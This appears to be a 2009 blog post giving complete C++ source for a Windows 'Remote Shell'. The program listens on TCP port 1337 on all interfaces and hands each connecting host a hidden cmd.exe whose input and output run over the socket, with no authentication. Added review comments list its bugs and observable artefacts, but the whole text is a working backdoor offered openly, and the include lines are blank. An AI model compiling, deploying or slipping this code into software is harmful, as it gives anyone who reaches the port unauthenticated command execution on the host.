Friday, July 10, 2009

Remote Shell


/*
Name: Shell
Author: Rik /Void
Date: 10/03/08 11:06
Description: Remote Shell
*/

#include
#include

/* Thread entry point defined below; WinMain passes the accepted socket value
   through the void* argument rather than pointing at real storage. */
DWORD CALLBACK StartRemoteShell(void* client_socket);

/*
 * Process entry point. Opens a TCP listener on port 1337 on every local
 * interface and starts one StartRemoteShell thread per accepted connection.
 * None of the four WinMain parameters is used.
 *
 * Review notes (what this code exposes and what an analyst can observe):
 *  - Nothing in this file authenticates the peer or encrypts the stream, so
 *    any host that can reach the port is handed to StartRemoteShell as-is.
 *  - The program uses the WinMain entry point and creates no window of its
 *    own; the visible footprint is a listening TCP socket on port 1337.
 *  - No return value (WSAStartup, WSASocket, connect, bind, listen, accept,
 *    CreateThread) is checked, so a failure at any step goes unnoticed.
 *  - The accept loop never exits: there is no return statement, no
 *    WSACleanup, and the listening socket is never closed.
 *  - The code relies on C++ (`sockaddr_in` without `struct`, `true`).
 */
int APIENTRY WinMain(HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
WSADATA Data;
/* Only sin_family, sin_port and sin_addr are assigned below; the structure is
   never zeroed, so its padding bytes are indeterminate. */
sockaddr_in sockAddr;
/* Requests Winsock version 2.0; the result is ignored. */
WSAStartup(MAKEWORD(2,0),&Data);

/* Listening socket. The SOCKET handle is stored in an int, which narrows the
   value on 64-bit Windows where SOCKET is pointer-sized. */
int Sock = WSASocket(AF_INET, SOCK_STREAM,IPPROTO_TCP,0,0,0);

/* Second socket, used only for the connect/close pair below. */
int SendSock = WSASocket(AF_INET, SOCK_STREAM,IPPROTO_TCP,0,0,0);


sockAddr.sin_family = AF_INET;
sockAddr.sin_port = htons(1337);
sockAddr.sin_addr.s_addr = INADDR_ANY;

/* Connects to address 0.0.0.0, port 1337 and closes the socket immediately;
   the result is discarded.
   NOTE(review): the purpose is not evident from this file -- possibly a probe
   for an already-running instance, but nothing acts on the outcome. */
connect(SendSock,(sockaddr*)&sockAddr,sizeof(sockAddr));
closesocket(SendSock);
/* Redundant: s_addr already holds INADDR_ANY from the assignment above. */
sockAddr.sin_addr.s_addr = INADDR_ANY;

/* INADDR_ANY binds the listener to all interfaces, not just loopback. */
bind(Sock,(sockaddr*)&sockAddr,sizeof(sockAddr));

/* Backlog of 10 pending connections. */
listen(Sock,10);

while(true)
{
/* The peer address is not requested (both address arguments are 0), so the
   program keeps no record of who connected. A failed accept is not detected
   and its return value is still passed to a new thread. */
int Client = accept(Sock,0,0);
/* One thread per connection with no upper bound; the returned thread handle
   is dropped without CloseHandle. The socket value travels inside the
   void* argument. */
CreateThread(0,0,StartRemoteShell,(void*)Client,0,0);
}


}

/*
 * Per-connection thread routine: starts cmd.exe with its standard input,
 * output and error all set to the client socket, waits for that process to
 * exit, then closes the socket.
 *
 * client_socket: the accepted socket value carried in a void*, not a pointer
 *                to storage.
 * Returns 0 in every case; failures are not reported.
 *
 * Review notes:
 *  - The child is created with no separate token or security attributes, so
 *    it runs in the same security context as this process.
 *  - Observable artefacts: a cmd.exe child started with a hidden window whose
 *    three standard handles all refer to a network socket.
 *  - CreateProcess is not checked. On failure `pi` is uninitialised and
 *    WaitForSingleObject is called on an indeterminate handle.
 *  - pi.hProcess and pi.hThread are never closed, leaking two handles per
 *    connection.
 */
DWORD CALLBACK StartRemoteShell(void* client_socket)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
/* Recovers the socket value that WinMain packed into the pointer argument. */
int Client = (int)client_socket;

memset(&si,0,sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);
/* Use the hStd* handles and the wShowWindow value set below. */
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
/* The child's console window is not shown on the desktop. */
si.wShowWindow = SW_HIDE;
/* All three standard streams of the child are redirected to the socket. */
si.hStdError = si.hStdInput = si.hStdOutput = (HANDLE)Client;

/* Hard-coded interpreter path. bInheritHandles is TRUE, so the child receives
   every inheritable handle of this process, not only the client socket. */
CreateProcess("C:\\Windows\\System32\\cmd.exe",NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
/* Blocks this thread with no timeout until the child exits. */
WaitForSingleObject(pi.hProcess, INFINITE);
closesocket(Client);
return 0;
}
